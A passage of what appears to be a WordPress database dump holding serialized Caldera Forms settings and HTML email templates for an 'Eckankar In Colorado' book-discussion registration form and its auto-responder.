\'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Request</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this email, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(43,'CF60874262a3d99','primary','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Wed, 28 Apr 2021 02:11:23 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:149:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>																		\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8016:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Request</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this email, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: 